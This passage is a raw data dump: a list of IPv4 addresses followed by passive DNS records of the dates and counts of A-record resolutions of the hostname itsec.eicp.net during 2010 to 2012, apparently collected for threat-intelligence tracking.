115.171.114.160
115.171.116.27
115.171.118.227
115.171.119.50
115.171.121.27
115.171.124.245
115.171.127.215
115.171.128.17
115.171.132.26
115.171.132.46
115.171.135.11
115.171.138.110
115.171.139.104
115.171.141.206
115.171.143.109
115.171.15.22
115.171.15.58
115.171.17.183
115.171.18.98
115.171.34.145
115.171.37.160
115.171.37.32
115.171.38.40
115.171.4.134
115.171.4.239
115.171.40.114
115.171.41.235
115.171.45.117
115.171.46.36
115.171.47.154
115.171.47.8
115.171.49.46
115.171.5.76
115.171.51.175
115.171.61.159
116.69.194.241
116.69.44.161
120.50.35.60
122.147.136.56
123.117.16.231
123.117.16.92
123.117.19.168
123.117.20.202
123.117.22.18
123.120.100.101
123.120.100.205
123.120.100.41
123.120.100.90
123.120.101.100
123.120.101.162
123.120.101.189
123.120.101.204
123.120.101.23
123.120.101.94
123.120.102.114
123.120.102.160
123.120.102.212
123.120.102.25
123.120.102.252
123.120.103.147
123.120.103.242
123.120.103.50
123.120.103.6
123.120.103.8
123.120.104.16
123.120.104.49
123.120.104.77
123.120.104.93
123.120.105.159
123.120.106.139
123.120.106.234
123.120.106.70
123.120.106.92
123.120.107.130
123.120.107.173
123.120.107.211
123.120.107.6
123.120.107.63
123.120.107.82
123.120.108.147
123.120.108.176
123.120.108.180
123.120.108.2
123.120.108.212
123.120.108.245
123.120.108.46
123.120.108.71
123.120.108.75
123.120.108.98
123.120.109.150
123.120.109.158
123.120.109.88
123.120.110.172
123.120.110.212
123.120.110.233
123.120.110.25
123.120.110.4
123.120.110.49
123.120.110.52
123.120.110.78
123.120.111.168
123.120.111.201
123.120.112.147
123.120.112.180
123.120.112.218
123.120.113.120
123.120.113.17
123.120.113.245
123.120.113.251
123.120.113.45
123.120.114.185
123.120.114.207
123.120.114.208
123.120.114.228
123.120.114.242
123.120.114.46
123.120.114.90
123.120.115.194
123.120.115.210
123.120.116.168
123.120.116.181
123.120.116.185
123.120.116.52
123.120.116.95
123.120.117.100
123.120.117.189
123.120.117.214
123.120.117.47
123.120.117.74
123.120.117.83
123.120.118.101
123.120.118.107
123.120.118.127
123.120.118.132
123.120.118.139
123.120.118.155
123.120.118.180
123.120.118.225
123.120.118.98
123.120.119.128
123.120.119.144
123.120.119.41
123.120.119.62
123.120.119.82
123.120.120.154
123.120.120.174
123.120.120.235
123.120.120.252
123.120.120.3
123.120.120.35
123.120.120.79
123.120.120.82
123.120.120.86
123.120.121.149
123.120.121.164
123.120.121.51
123.120.121.53
123.120.121.56
123.120.121.6
123.120.121.80
123.120.122.102
123.120.122.118
123.120.122.141
123.120.122.146
123.120.122.158
123.120.122.201
123.120.122.3
123.120.122.46
123.120.122.88
123.120.123.125
123.120.123.184
123.120.123.186
123.120.123.229
123.120.123.46
123.120.123.82
123.120.124.149
123.120.124.16
123.120.124.165
123.120.124.168
123.120.124.197
123.120.124.33
123.120.124.41
123.120.124.43
123.120.124.55
123.120.124.74
123.120.125.156
123.120.125.225
123.120.125.226
123.120.125.245
123.120.125.4
123.120.126.103
123.120.126.116
123.120.126.127
123.120.126.139
123.120.126.140
123.120.126.163
123.120.126.186
123.120.126.225
123.120.126.23
123.120.126.56
123.120.126.60
123.120.126.86
123.120.127.143
123.120.127.160
123.120.127.210
123.120.127.23
123.120.127.59
123.120.127.87
123.120.96.128
123.120.96.150
123.120.96.159
123.120.96.235
123.120.97.101
123.120.97.156
123.120.97.193
123.120.97.27
123.120.98.116
123.120.98.161
123.120.98.22
123.120.99.110
123.120.99.151
123.120.99.159
123.120.99.190
123.120.99.30
123.120.99.39
123.120.99.74
123.120.99.86
204.16.193.12
209.11.241.144
42.90.16.38
42.90.21.154
42.90.213.155
42.90.224.201
60.194.1.105
65.19.157.229

pDNS

count 35883
first seen 2012-01-01 04:33:53 -0000
last seen 2012-12-03 23:00:20 -0000
itsec.eicp.net. A 0.0.0.0

count 43
first seen 2012-05-27 01:16:35 -0000
last seen 2012-05-27 02:25:19 -0000
itsec.eicp.net. A 1.203.0.145

count 188
first seen 2012-05-13 01:31:07 -0000
last seen 2012-05-13 06:09:04 -0000
itsec.eicp.net. A 1.203.1.2

count 51
first seen 2012-05-16 14:31:01 -0000
last seen 2012-05-16 17:13:18 -0000
itsec.eicp.net. A 1.203.1.31

count 96
first seen 2012-06-12 04:14:16 -0000
last seen 2012-06-12 16:43:38 -0000
itsec.eicp.net. A 1.203.1.74

count 111
first seen 2012-05-26 00:19:17 -0000
last seen 2012-05-26 15:49:18 -0000
itsec.eicp.net. A 1.203.2.67

count 4
first seen 2012-05-24 04:21:46 -0000
last seen 2012-05-24 06:19:19 -0000
itsec.eicp.net. A 1.203.2.104

count 2
first seen 2012-06-13 04:20:05 -0000
last seen 2012-06-13 05:20:05 -0000
itsec.eicp.net. A 1.203.2.146

count 276
first seen 2012-06-08 17:19:11 -0000
last seen 2012-06-09 00:19:10 -0000
itsec.eicp.net. A 1.203.2.180

count 1
first seen 2012-06-13 11:50:04 -0000
last seen 2012-06-13 11:50:04 -0000
itsec.eicp.net. A 1.203.3.50

count 38
first seen 2012-03-21 15:48:49 -0000
last seen 2012-03-21 19:16:29 -0000
itsec.eicp.net. A 1.203.3.53

count 23
first seen 2012-03-30 04:30:09 -0000
last seen 2012-03-30 05:42:41 -0000
itsec.eicp.net. A 1.203.7.121

count 15
first seen 2012-10-21 07:24:44 -0000
last seen 2012-10-21 15:00:55 -0000
itsec.eicp.net. A 1.203.7.234

count 33
first seen 2012-04-10 04:32:49 -0000
last seen 2012-04-10 06:05:03 -0000
itsec.eicp.net. A 1.203.9.204

count 33
first seen 2012-05-25 04:19:20 -0000
last seen 2012-05-25 06:19:17 -0000
itsec.eicp.net. A 1.203.10.5

count 10
first seen 2012-09-25 03:03:33 -0000
last seen 2012-09-25 08:40:07 -0000
itsec.eicp.net. A 1.203.10.99

count 1141
first seen 2012-09-08 14:15:40 -0000
last seen 2012-09-09 23:35:19 -0000
itsec.eicp.net. A 1.203.10.220

count 14
first seen 2012-07-30 11:00:01 -0000
last seen 2012-07-30 23:40:01 -0000
itsec.eicp.net. A 1.203.11.44

count 13
first seen 2012-04-26 14:33:48 -0000
last seen 2012-04-26 15:15:38 -0000
itsec.eicp.net. A 1.203.12.38

count 4
first seen 2012-05-21 13:19:20 -0000
last seen 2012-05-21 15:49:20 -0000
itsec.eicp.net. A 1.203.13.190

count 5
first seen 2012-10-01 13:16:07 -0000
last seen 2012-10-01 13:47:24 -0000
itsec.eicp.net. A 1.203.14.147

count 6
first seen 2012-05-13 01:25:21 -0000
last seen 2012-05-13 01:30:06 -0000
itsec.eicp.net. A 1.203.15.95

count 20
first seen 2012-07-16 13:44:57 -0000
last seen 2012-07-16 23:14:57 -0000
itsec.eicp.net. A 1.203.15.234

count 231
first seen 2012-05-15 13:46:15 -0000
last seen 2012-05-15 23:56:53 -0000
itsec.eicp.net. A 1.203.17.16

count 7
first seen 2012-11-21 11:59:57 -0000
last seen 2012-11-21 17:39:55 -0000
itsec.eicp.net. A 1.203.17.192

count 6
first seen 2012-06-03 07:19:14 -0000
last seen 2012-06-03 12:19:13 -0000
itsec.eicp.net. A 1.203.18.5

count 18
first seen 2012-05-17 14:17:24 -0000
last seen 2012-05-17 15:37:32 -0000
itsec.eicp.net. A 1.203.18.11

count 251
first seen 2012-09-10 11:40:08 -0000
last seen 2012-09-10 23:40:58 -0000
itsec.eicp.net. A 1.203.18.65

count 1
first seen 2012-09-24 04:20:07 -0000
last seen 2012-09-24 04:20:07 -0000
itsec.eicp.net. A 1.203.19.156

count 2
first seen 2012-08-04 14:59:59 -0000
last seen 2012-08-04 15:19:59 -0000
itsec.eicp.net. A 1.203.19.210

count 5
first seen 2012-03-13 16:36:58 -0000
last seen 2012-03-13 17:31:37 -0000
itsec.eicp.net. A 1.203.20.121

count 11
first seen 2012-09-13 04:13:25 -0000
last seen 2012-09-13 05:00:10 -0000
itsec.eicp.net. A 1.203.21.177

count 2
first seen 2012-06-05 04:49:13 -0000
last seen 2012-06-05 05:49:13 -0000
itsec.eicp.net. A 1.203.24.239

count 2
first seen 2012-07-24 06:20:04 -0000
last seen 2012-07-24 06:40:03 -0000
itsec.eicp.net. A 1.203.25.244

count 10
first seen 2012-10-20 03:45:20 -0000
last seen 2012-10-20 07:40:10 -0000
itsec.eicp.net. A 1.203.26.24

count 441
first seen 2012-06-18 13:29:03 -0000
last seen 2012-06-19 04:22:45 -0000
itsec.eicp.net. A 1.203.29.42

count 2
first seen 2012-09-03 13:58:24 -0000
last seen 2012-09-03 15:31:36 -0000
itsec.eicp.net. A 1.203.30.194

count 5
first seen 2012-07-17 04:44:57 -0000
last seen 2012-07-17 06:29:57 -0000
itsec.eicp.net. A 1.203.30.207

count 302
first seen 2012-08-30 16:29:53 -0000
last seen 2012-08-30 23:00:03 -0000
itsec.eicp.net. A 1.203.30.209

count 16
first seen 2012-07-22 04:00:05 -0000
last seen 2012-07-22 23:30:06 -0000
itsec.eicp.net. A 1.203.30.222

count 374
first seen 2012-04-14 13:53:35 -0000
last seen 2012-04-15 12:34:27 -0000
itsec.eicp.net. A 1.203.31.150

count 13
first seen 2012-11-05 12:40:04 -0000
last seen 2012-11-05 23:20:03 -0000
itsec.eicp.net. A 1.203.31.195

count 121
first seen 2012-06-15 04:50:03 -0000
last seen 2012-06-16 00:20:03 -0000
itsec.eicp.net. A 1.203.32.224

count 18
first seen 2012-11-23 12:59:55 -0000
last seen 2012-11-24 01:59:55 -0000
itsec.eicp.net. A 1.203.34.234

count 8
first seen 2012-05-13 06:19:30 -0000
last seen 2012-05-13 07:42:35 -0000
itsec.eicp.net. A 1.203.35.154

count 62
first seen 2012-06-23 00:33:11 -0000
last seen 2012-06-23 13:20:03 -0000
itsec.eicp.net. A 1.203.39.175

count 9
first seen 2012-10-31 13:40:07 -0000
last seen 2012-10-31 23:00:09 -0000
itsec.eicp.net. A 1.203.39.230

count 23
first seen 2012-11-02 22:40:06 -0000
last seen 2012-11-03 07:00:11 -0000
itsec.eicp.net. A 1.203.40.174

count 115
first seen 2012-05-27 02:26:19 -0000
last seen 2012-05-27 11:19:17 -0000
itsec.eicp.net. A 1.203.40.184

count 277
first seen 2012-10-06 09:20:03 -0000
last seen 2012-10-07 00:03:51 -0000
itsec.eicp.net. A 1.203.42.67

count 3
first seen 2012-05-07 04:19:35 -0000
last seen 2012-05-07 05:49:34 -0000
itsec.eicp.net. A 1.203.43.157

count 15
first seen 2012-06-23 13:50:03 -0000
last seen 2012-06-23 23:50:03 -0000
itsec.eicp.net. A 1.203.43.198

count 28
first seen 2012-07-07 21:59:59 -0000
last seen 2012-07-08 11:59:59 -0000
itsec.eicp.net. A 1.203.44.197

count 4
first seen 2012-05-25 10:19:18 -0000
last seen 2012-05-25 14:49:18 -0000
itsec.eicp.net. A 1.203.45.36

count 1
first seen 2012-09-11 15:00:11 -0000
last seen 2012-09-11 15:00:11 -0000
itsec.eicp.net. A 1.203.47.53

count 37
first seen 2012-07-10 08:29:58 -0000
last seen 2012-07-10 22:44:59 -0000
itsec.eicp.net. A 1.203.48.243

count 23
first seen 2012-10-14 11:44:13 -0000
last seen 2012-10-14 13:41:36 -0000
itsec.eicp.net. A 1.203.50.146

count 2
first seen 2012-01-23 18:33:43 -0000
last seen 2012-01-24 00:33:07 -0000
itsec.eicp.net. A 1.203.51.149

count 368
first seen 2012-04-02 13:57:02 -0000
last seen 2012-04-03 13:58:25 -0000
itsec.eicp.net. A 1.203.53.41

count 116
first seen 2012-10-23 13:47:03 -0000
last seen 2012-10-23 23:58:05 -0000
itsec.eicp.net. A 1.203.54.227

count 5
first seen 2012-09-03 04:18:31 -0000
last seen 2012-09-03 04:22:18 -0000
itsec.eicp.net. A 1.203.56.206

count 13
first seen 2012-11-23 04:39:55 -0000
last seen 2012-11-23 11:59:55 -0000
itsec.eicp.net. A 1.203.56.239

count 239
first seen 2012-09-18 10:40:08 -0000
last seen 2012-09-18 23:51:31 -0000
itsec.eicp.net. A 1.203.59.47

count 1
first seen 2012-07-14 11:29:58 -0000
last seen 2012-07-14 11:29:58 -0000
itsec.eicp.net. A 1.203.60.36

count 4
first seen 2012-07-06 14:45:00 -0000
last seen 2012-07-06 15:45:00 -0000
itsec.eicp.net. A 1.203.60.113

count 7
first seen 2012-02-24 13:49:53 -0000
last seen 2012-02-25 00:49:52 -0000
itsec.eicp.net. A 1.203.65.120

count 212
first seen 2012-04-15 12:51:55 -0000
last seen 2012-04-15 23:51:42 -0000
itsec.eicp.net. A 1.203.68.172

count 3
first seen 2012-11-07 14:20:03 -0000
last seen 2012-11-07 16:00:11 -0000
itsec.eicp.net. A 1.203.69.112

count 1
first seen 2012-02-16 04:42:42 -0000
last seen 2012-02-16 04:42:42 -0000
itsec.eicp.net. A 1.203.69.142

count 45
first seen 2012-09-17 04:18:23 -0000
last seen 2012-09-17 06:13:55 -0000
itsec.eicp.net. A 1.203.72.159

count 31
first seen 2012-05-07 12:52:52 -0000
last seen 2012-05-07 15:02:11 -0000
itsec.eicp.net. A 1.203.74.176

count 7
first seen 2012-02-28 17:19:48 -0000
last seen 2012-02-29 00:49:48 -0000
itsec.eicp.net. A 1.203.74.187

count 213
first seen 2012-09-30 00:40:05 -0000
last seen 2012-09-30 07:40:05 -0000
itsec.eicp.net. A 1.203.80.110

count 2
first seen 2012-10-28 10:20:08 -0000
last seen 2012-10-28 11:20:07 -0000
itsec.eicp.net. A 1.203.84.191

count 194
first seen 2012-04-05 04:52:30 -0000
last seen 2012-04-05 13:53:34 -0000
itsec.eicp.net. A 1.203.86.130

count 13
first seen 2012-10-30 14:00:08 -0000
last seen 2012-10-30 19:20:07 -0000
itsec.eicp.net. A 1.203.89.139

count 42
first seen 2012-03-21 03:01:47 -0000
last seen 2012-03-21 07:05:04 -0000
itsec.eicp.net. A 1.203.91.18

count 59
first seen 2012-03-09 15:42:46 -0000
last seen 2012-03-10 00:03:05 -0000
itsec.eicp.net. A 1.203.95.163

count 110
first seen 2012-03-30 14:54:39 -0000
last seen 2012-03-30 21:14:00 -0000
itsec.eicp.net. A 1.203.97.206

count 8
first seen 2012-11-06 04:20:04 -0000
last seen 2012-11-06 08:40:03 -0000
itsec.eicp.net. A 1.203.98.98

count 22
first seen 2012-03-29 04:49:54 -0000
last seen 2012-03-29 05:56:09 -0000
itsec.eicp.net. A 1.203.99.36

count 1
first seen 2011-10-13 15:49:33 -0000
last seen 2011-10-13 15:49:33 -0000
itsec.eicp.net. A 1.203.99.111

count 59
first seen 2012-03-19 15:49:59 -0000
last seen 2012-03-20 01:18:52 -0000
itsec.eicp.net. A 1.203.100.232

count 21
first seen 2012-04-08 14:24:11 -0000
last seen 2012-04-08 15:24:43 -0000
itsec.eicp.net. A 1.203.102.63

count 1
first seen 2011-12-04 14:33:49 -0000
last seen 2011-12-04 14:33:49 -0000
itsec.eicp.net. A 1.203.102.251

count 359
first seen 2012-09-24 13:40:06 -0000
last seen 2012-09-25 03:02:32 -0000
itsec.eicp.net. A 1.203.103.227

count 21
first seen 2012-04-30 09:49:41 -0000
last seen 2012-04-30 14:20:13 -0000
itsec.eicp.net. A 1.203.104.45

count 61
first seen 2012-05-09 04:12:56 -0000
last seen 2012-05-09 06:36:53 -0000
itsec.eicp.net. A 1.203.106.150

count 355
first seen 2012-10-12 09:29:20 -0000
last seen 2012-10-12 23:38:36 -0000
itsec.eicp.net. A 1.203.107.125

count 1
first seen 2011-12-27 20:34:41 -0000
last seen 2011-12-27 20:34:41 -0000
itsec.eicp.net. A 1.203.107.200

count 1
first seen 2012-05-08 04:19:34 -0000
last seen 2012-05-08 04:19:34 -0000
itsec.eicp.net. A 1.203.108.46

count 108
first seen 2012-09-21 08:00:09 -0000
last seen 2012-09-21 22:40:06 -0000
itsec.eicp.net. A 1.203.109.193

count 10
first seen 2012-11-20 10:39:56 -0000
last seen 2012-11-20 22:59:56 -0000
itsec.eicp.net. A 1.203.112.147

count 2
first seen 2012-01-26 04:33:23 -0000
last seen 2012-01-26 06:34:49 -0000
itsec.eicp.net. A 1.203.112.178

count 7
first seen 2012-10-25 02:42:39 -0000
last seen 2012-10-25 06:00:10 -0000
itsec.eicp.net. A 1.203.113.2

count 11
first seen 2012-11-16 08:19:59 -0000
last seen 2012-11-16 17:19:58 -0000
itsec.eicp.net. A 1.203.114.165

count 13
first seen 2012-12-01 04:40:20 -0000
last seen 2012-12-01 13:40:21 -0000
itsec.eicp.net. A 1.203.118.19

count 1
first seen 2012-01-04 14:35:20 -0000
last seen 2012-01-04 14:35:20 -0000
itsec.eicp.net. A 1.203.123.29

count 1
first seen 2012-10-19 14:40:12 -0000
last seen 2012-10-19 14:40:12 -0000
itsec.eicp.net. A 1.203.123.68

count 213
first seen 2012-10-22 12:20:09 -0000
last seen 2012-10-22 23:20:09 -0000
itsec.eicp.net. A 1.203.123.83

count 38
first seen 2012-04-13 04:19:45 -0000
last seen 2012-04-13 05:57:52 -0000
itsec.eicp.net. A 1.203.125.201

count 62
first seen 2012-03-07 16:43:44 -0000
last seen 2012-03-08 00:10:18 -0000
itsec.eicp.net. A 1.203.125.248

count 11
first seen 2012-03-08 06:09:11 -0000
last seen 2012-03-08 07:26:47 -0000
itsec.eicp.net. A 1.203.132.54

count 1
first seen 2012-03-15 17:50:03 -0000
last seen 2012-03-15 17:50:03 -0000
itsec.eicp.net. A 1.203.132.236

count 3
first seen 2012-03-22 09:49:57 -0000
last seen 2012-03-22 10:49:58 -0000
itsec.eicp.net. A 1.203.135.238

count 1
first seen 2011-12-29 10:31:41 -0000
last seen 2011-12-29 10:31:41 -0000
itsec.eicp.net. A 1.203.137.25

count 448
first seen 2012-04-19 04:37:55 -0000
last seen 2012-04-19 23:41:20 -0000
itsec.eicp.net. A 1.203.139.94

count 110
first seen 2012-03-25 14:41:20 -0000
last seen 2012-03-26 03:58:37 -0000
itsec.eicp.net. A 1.203.139.148

count 179
first seen 2012-03-29 14:25:09 -0000
last seen 2012-03-29 23:32:29 -0000
itsec.eicp.net. A 1.203.142.100

count 604
first seen 2012-03-31 04:49:14 -0000
last seen 2012-04-01 13:25:24 -0000
itsec.eicp.net. A 1.203.142.111

count 759
first seen 2012-08-11 02:45:34 -0000
last seen 2012-08-14 02:39:56 -0000
itsec.eicp.net. A 42.90.16.38

count 2
first seen 2012-08-07 09:59:58 -0000
last seen 2012-08-07 12:39:58 -0000
itsec.eicp.net. A 42.90.21.154

count 1
first seen 2012-08-14 02:59:56 -0000
last seen 2012-08-14 02:59:56 -0000
itsec.eicp.net. A 42.90.213.155

count 892
first seen 2012-08-14 04:59:56 -0000
last seen 2012-08-21 12:00:07 -0000
itsec.eicp.net. A 42.90.224.201

count 914
first seen 2012-08-27 03:45:50 -0000
last seen 2012-09-05 02:46:27 -0000
itsec.eicp.net. A 60.194.1.105

count 12
first seen 2011-09-22 21:54:21 -0000
last seen 2011-10-09 01:59:50 -0000
itsec.eicp.net. A 65.19.157.229

count 6
first seen 2012-02-25 07:19:52 -0000
last seen 2012-02-25 11:49:52 -0000
itsec.eicp.net. A 111.194.92.111

count 81
first seen 2012-03-06 01:40:11 -0000
last seen 2012-03-06 16:05:07 -0000
itsec.eicp.net. A 111.194.92.203

count 8
first seen 2012-03-13 01:50:05 -0000
last seen 2012-03-13 04:11:27 -0000
itsec.eicp.net. A 111.194.93.62

count 5
first seen 2012-03-31 01:23:41 -0000
last seen 2012-03-31 01:38:31 -0000
itsec.eicp.net. A 111.194.93.67

count 103
first seen 2012-03-19 02:03:14 -0000
last seen 2012-03-19 15:39:57 -0000
itsec.eicp.net. A 111.194.93.187

count 18
first seen 2012-03-27 02:40:30 -0000
last seen 2012-03-27 03:31:49 -0000
itsec.eicp.net. A 111.194.94.99

count 4
first seen 2012-03-01 12:49:48 -0000
last seen 2012-03-01 15:49:47 -0000
itsec.eicp.net. A 111.194.94.141

count 20
first seen 2012-03-13 05:50:05 -0000
last seen 2012-03-13 15:46:49 -0000
itsec.eicp.net. A 111.194.94.188

count 50
first seen 2012-03-30 06:42:06 -0000
last seen 2012-03-30 09:16:46 -0000
itsec.eicp.net. A 111.194.96.44

count 10
first seen 2012-03-17 02:15:39 -0000
last seen 2012-03-17 03:12:28 -0000
itsec.eicp.net. A 111.194.96.100

count 2
first seen 2012-02-22 10:36:03 -0000
last seen 2012-02-22 12:34:48 -0000
itsec.eicp.net. A 111.194.96.194

count 2
first seen 2012-02-27 13:49:50 -0000
last seen 2012-02-27 14:49:50 -0000
itsec.eicp.net. A 111.194.97.55

count 48
first seen 2012-03-10 03:00:42 -0000
last seen 2012-03-10 12:51:14 -0000
itsec.eicp.net. A 111.194.97.128

count 71
first seen 2012-03-12 01:52:19 -0000
last seen 2012-03-12 15:46:40 -0000
itsec.eicp.net. A 111.194.98.34

count 59
first seen 2012-03-17 03:32:00 -0000
last seen 2012-03-17 12:59:43 -0000
itsec.eicp.net. A 111.194.99.29

count 22
first seen 2012-03-15 01:29:19 -0000
last seen 2012-03-15 05:08:40 -0000
itsec.eicp.net. A 111.194.101.196

count 8
first seen 2012-03-07 04:09:14 -0000
last seen 2012-03-07 05:19:44 -0000
itsec.eicp.net. A 111.194.104.129

count 30
first seen 2012-03-16 07:16:56 -0000
last seen 2012-03-16 12:52:19 -0000
itsec.eicp.net. A 111.194.104.220

count 8
first seen 2012-02-27 02:49:51 -0000
last seen 2012-02-27 10:19:50 -0000
itsec.eicp.net. A 111.194.105.63

count 242
first seen 2012-03-03 01:54:54 -0000
last seen 2012-03-05 00:19:45 -0000
itsec.eicp.net. A 111.194.106.206

count 14
first seen 2012-03-08 01:26:10 -0000
last seen 2012-03-08 05:26:20 -0000
itsec.eicp.net. A 111.194.106.225

count 1
first seen 2012-02-23 08:39:14 -0000
last seen 2012-02-23 08:39:14 -0000
itsec.eicp.net. A 111.194.107.0

count 23
first seen 2012-03-29 06:12:56 -0000
last seen 2012-03-29 07:39:08 -0000
itsec.eicp.net. A 111.194.108.247

count 13
first seen 2012-03-26 04:03:39 -0000
last seen 2012-03-26 05:26:40 -0000
itsec.eicp.net. A 111.194.109.36

count 70
first seen 2012-03-14 01:55:25 -0000
last seen 2012-03-14 16:21:20 -0000
itsec.eicp.net. A 111.194.109.202

count 17
first seen 2012-03-22 01:33:54 -0000
last seen 2012-03-22 04:53:07 -0000
itsec.eicp.net. A 111.194.111.0

count 2
first seen 2012-02-25 02:49:52 -0000
last seen 2012-02-25 03:49:53 -0000
itsec.eicp.net. A 111.194.111.16

count 1
first seen 2012-02-28 16:19:50 -0000
last seen 2012-02-28 16:19:50 -0000
itsec.eicp.net. A 111.194.116.110

count 139
first seen 2012-03-22 13:49:58 -0000
last seen 2012-03-23 14:29:46 -0000
itsec.eicp.net. A 111.194.116.160

count 35
first seen 2012-03-07 12:19:44 -0000
last seen 2012-03-07 16:28:07 -0000
itsec.eicp.net. A 111.194.119.106

count 90
first seen 2012-03-08 13:07:02 -0000
last seen 2012-03-09 01:14:27 -0000
itsec.eicp.net. A 111.194.120.159

count 3
first seen 2012-03-21 12:50:45 -0000
last seen 2012-03-21 12:52:49 -0000
itsec.eicp.net. A 111.194.123.34

count 26
first seen 2012-09-03 23:51:42 -0000
last seen 2012-09-04 00:17:28 -0000
itsec.eicp.net. A 114.248.80.81

count 141
first seen 2012-08-27 23:57:15 -0000
last seen 2012-08-28 05:39:57 -0000
itsec.eicp.net. A 114.248.80.84

count 133
first seen 2012-04-17 09:23:55 -0000
last seen 2012-04-17 15:07:00 -0000
itsec.eicp.net. A 114.248.80.175

count 2
first seen 2012-06-24 07:50:03 -0000
last seen 2012-06-24 09:20:03 -0000
itsec.eicp.net. A 114.248.80.241

count 76
first seen 2012-09-14 01:09:22 -0000
last seen 2012-09-14 02:13:45 -0000
itsec.eicp.net. A 114.248.81.30

count 1
first seen 2012-06-19 07:50:02 -0000
last seen 2012-06-19 07:50:02 -0000
itsec.eicp.net. A 114.248.81.42

count 3
first seen 2012-09-11 08:00:10 -0000
last seen 2012-09-11 09:40:10 -0000
itsec.eicp.net. A 114.248.81.127

count 8
first seen 2012-10-19 00:18:36 -0000
last seen 2012-10-19 01:55:44 -0000
itsec.eicp.net. A 114.248.81.151

count 14
first seen 2012-05-04 01:22:31 -0000
last seen 2012-05-04 08:19:36 -0000
itsec.eicp.net. A 114.248.81.155

count 2
first seen 2012-12-04 00:00:19 -0000
last seen 2012-12-04 00:40:20 -0000
itsec.eicp.net. A 114.248.81.157

count 1
first seen 2011-09-28 10:01:39 -0000
last seen 2011-09-28 10:01:39 -0000
itsec.eicp.net. A 114.248.81.230

count 72
first seen 2012-05-16 23:37:36 -0000
last seen 2012-05-17 03:41:39 -0000
itsec.eicp.net. A 114.248.81.247

count 22
first seen 2012-04-12 02:16:28 -0000
last seen 2012-04-12 03:41:24 -0000
itsec.eicp.net. A 114.248.81.253

count 4
first seen 2012-09-29 00:20:06 -0000
last seen 2012-09-29 02:20:06 -0000
itsec.eicp.net. A 114.248.82.66

count 61
first seen 2012-09-02 14:14:46 -0000
last seen 2012-09-02 15:28:25 -0000
itsec.eicp.net. A 114.248.82.128

count 48
first seen 2012-05-16 06:10:05 -0000
last seen 2012-07-17 09:44:57 -0000
itsec.eicp.net. A 114.248.82.195

count 17
first seen 2012-04-24 02:49:37 -0000
last seen 2012-04-24 13:49:36 -0000
itsec.eicp.net. A 114.248.83.28

count 2
first seen 2012-08-31 03:00:07 -0000
last seen 2012-08-31 03:00:10 -0000
itsec.eicp.net. A 114.248.83.98

count 6
first seen 2012-08-27 07:43:44 -0000
last seen 2012-08-27 09:40:04 -0000
itsec.eicp.net. A 114.248.83.161

count 9
first seen 2012-09-04 02:36:12 -0000
last seen 2012-09-04 02:43:46 -0000
itsec.eicp.net. A 114.248.84.64

count 5
first seen 2012-07-23 01:00:05 -0000
last seen 2012-07-23 04:20:04 -0000
itsec.eicp.net. A 114.248.84.79

count 7
first seen 2012-11-09 01:00:02 -0000
last seen 2012-11-09 07:00:03 -0000
itsec.eicp.net. A 114.248.84.134

count 7
first seen 2012-06-21 06:20:03 -0000
last seen 2012-06-21 13:25:21 -0000
itsec.eicp.net. A 114.248.84.170

count 80
first seen 2012-05-09 06:41:46 -0000
last seen 2012-05-09 09:52:58 -0000
itsec.eicp.net. A 114.248.84.171

count 1
first seen 2012-11-30 09:59:54 -0000
last seen 2012-11-30 09:59:54 -0000
itsec.eicp.net. A 114.248.84.180

count 48
first seen 2012-05-14 23:45:21 -0000
last seen 2012-05-15 03:43:13 -0000
itsec.eicp.net. A 114.248.84.201

count 1
first seen 2012-02-08 07:03:41 -0000
last seen 2012-02-08 07:03:41 -0000
itsec.eicp.net. A 114.248.85.21

count 2
first seen 2012-06-26 08:50:01 -0000
last seen 2012-06-26 09:20:02 -0000
itsec.eicp.net. A 114.248.85.150

count 1
first seen 2011-12-07 04:38:28 -0000
last seen 2011-12-07 04:38:28 -0000
itsec.eicp.net. A 114.248.85.154

count 3
first seen 2012-06-26 00:50:03 -0000
last seen 2012-06-26 03:20:02 -0000
itsec.eicp.net. A 114.248.85.159

count 1
first seen 2011-12-29 06:32:16 -0000
last seen 2011-12-29 06:32:16 -0000
itsec.eicp.net. A 114.248.85.188

count 3
first seen 2012-05-24 09:49:20 -0000
last seen 2012-05-24 13:49:18 -0000
itsec.eicp.net. A 114.248.85.189

count 4
first seen 2012-09-18 06:20:08 -0000
last seen 2012-09-18 09:00:10 -0000
itsec.eicp.net. A 114.248.85.197

count 5
first seen 2012-09-04 08:00:10 -0000
last seen 2012-09-04 09:45:27 -0000
itsec.eicp.net. A 114.248.85.204

count 2
first seen 2012-07-18 07:30:09 -0000
last seen 2012-07-18 09:00:06 -0000
itsec.eicp.net. A 114.248.85.236

count 7
first seen 2012-08-29 06:34:10 -0000
last seen 2012-08-29 11:40:04 -0000
itsec.eicp.net. A 114.248.86.59

count 3
first seen 2012-07-11 04:00:00 -0000
last seen 2012-07-11 04:29:59 -0000
itsec.eicp.net. A 114.248.86.76

count 3
first seen 2012-09-26 07:40:05 -0000
last seen 2012-09-26 09:40:07 -0000
itsec.eicp.net. A 114.248.86.108

count 50
first seen 2010-12-02 06:10:06 -0000
last seen 2010-12-02 09:31:29 -0000
itsec.eicp.net. A 114.248.86.206

count 6
first seen 2012-09-10 01:43:08 -0000
last seen 2012-09-10 02:40:08 -0000
itsec.eicp.net. A 114.248.86.232

count 21
first seen 2012-09-18 23:52:16 -0000
last seen 2012-09-19 06:20:09 -0000
itsec.eicp.net. A 114.248.86.240

count 662
first seen 2012-10-27 00:55:01 -0000
last seen 2012-10-28 05:40:07 -0000
itsec.eicp.net. A 114.248.87.28

count 2
first seen 2012-05-07 02:49:35 -0000
last seen 2012-05-07 03:49:35 -0000
itsec.eicp.net. A 114.248.87.142

count 23
first seen 2012-12-03 00:20:21 -0000
last seen 2012-12-03 19:00:19 -0000
itsec.eicp.net. A 114.248.87.150

count 3
first seen 2012-05-23 01:24:41 -0000
last seen 2012-05-23 03:44:54 -0000
itsec.eicp.net. A 114.248.87.227

count 1
first seen 2012-04-10 03:33:27 -0000
last seen 2012-04-10 03:33:27 -0000
itsec.eicp.net. A 114.248.88.35

count 7
first seen 2012-05-22 08:19:20 -0000
last seen 2012-05-22 13:19:20 -0000
itsec.eicp.net. A 114.248.88.39

count 3
first seen 2012-06-25 01:20:02 -0000
last seen 2012-06-25 03:50:03 -0000
itsec.eicp.net. A 114.248.88.44

count 37
first seen 2012-05-09 01:45:00 -0000
last seen 2012-05-09 04:08:33 -0000
itsec.eicp.net. A 114.248.88.46

count 19
first seen 2012-05-16 00:47:35 -0000
last seen 2012-05-16 04:21:10 -0000
itsec.eicp.net. A 114.248.88.98

count 1
first seen 2012-11-02 00:40:06 -0000
